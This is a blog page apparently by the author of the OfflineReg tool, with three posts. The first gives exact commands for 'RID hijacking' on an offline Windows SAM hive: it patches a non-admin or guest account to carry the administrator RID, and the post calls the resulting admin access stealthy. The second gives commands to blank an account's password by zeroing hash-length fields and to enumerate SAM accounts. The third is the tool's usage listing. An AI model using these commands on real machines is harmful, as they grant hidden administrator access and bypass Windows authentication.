Août 182019
 

Following a post here on how to blank an account’s password using offlinereg, this time, lets see how to perform « RID hijacking ».

The local admin account has a 01F4 rid.
What about « patching » another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 « c:\windows\system32\config\SAM » sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite « stealthy » as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy…

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.

 

Download/Discuss it here

Fév 032018
 

From an offline SAM hive (could be from winpe), run the below command, reboot and log in with a blank password.
CAREFULL : make a backup of your hive first !


OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat v 0 160
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat v 0 172

See here for more details about setvaluebyteat details.

000003e8 is my custom local admin account.
000001f4 would be the default windows account.
0xA0 (160) and 0xAC (170) are the offset for the LM and NTLM hash lengths: setting this to 0 effectively set the password to blank.

Use the below command line to enum accounts in your SAM db.


OfflineReg-win32 "c:\windows\system32\config\SAM" SAM\Domains\Account\Users enumkeys

 Posted by at 14 h 45 min
Fév 032018
 

Lots of additions, changes, bug fixes, etc made to OfflineReg.

Discussion here.

Donwload here.

Command line

OfflineReg v1.0.3 by Erwan.L - https://erwan.labalec.fr/ - erwan2212@gmail.fr
Main Usage : OfflineReg hivepath keypath verb argument(s)
Example : OfflineReg "c:\temp\system" a_key_path getvalue a_value_name
Example : OfflineReg "c:\temp\system" a_key_path getvaluebyteat a_value_name offset
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_sz_value a_new_value
Example : OfflineReg "c:\temp\system" a_key_path setvalue " " a_new_value -> will set default key
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_dword_value a_dword_value 4
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_qword_value a_qword_value 11
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_binary_value 0a,0b,0c,0d,0e,0f 3
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_binary_value "0a 0b 0c 0d 0e 0f" 3
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_multi_sz_value "blah blah blah" 7
Example : OfflineReg "c:\temp\system" a_key_path setvalue a_reg_expand_sz_value "blah blah blah" 2
Example : OfflineReg "c:\temp\system" a_key_path setvaluebyteat a_reg_binary_value a_byte_value offset
Example : OfflineReg "c:\temp\system" a_key_path deletevalue a_value
Example : OfflineReg "c:\temp\system" a_key_path deletekey a_key
Example : OfflineReg "c:\temp\system" a_key_path deletekey
Example : OfflineReg "c:\temp\system" a_key_path deletekeys
Example : OfflineReg "c:\temp\system" a_key_path createkey a_key
Example : OfflineReg "c:\temp\system" a_key_path createkey
Example : OfflineReg "c:\temp\system" " " createkey a_key -> will create a key under root
Example : OfflineReg "c:\temp\system" a_key_path enumkeys
Example : OfflineReg "c:\temp\system" " " enumkeys -> will enum keys under root
Example : OfflineReg "c:\temp\system" a_key_path enumkeysR
Example : OfflineReg "c:\temp\system" a_key_path enumvalues
Example : OfflineReg "c:\temp\system" a_key_path enumvaluesall
Example : OfflineReg "c:\temp\system" a_key_path create
Example : OfflineReg "c:\temp\system" " " create
Example : OfflineReg "c:\temp\system" " " import commands.reg
Example : OfflineReg "c:\temp\system" " " run commands.txt

 Posted by at 14 h 36 min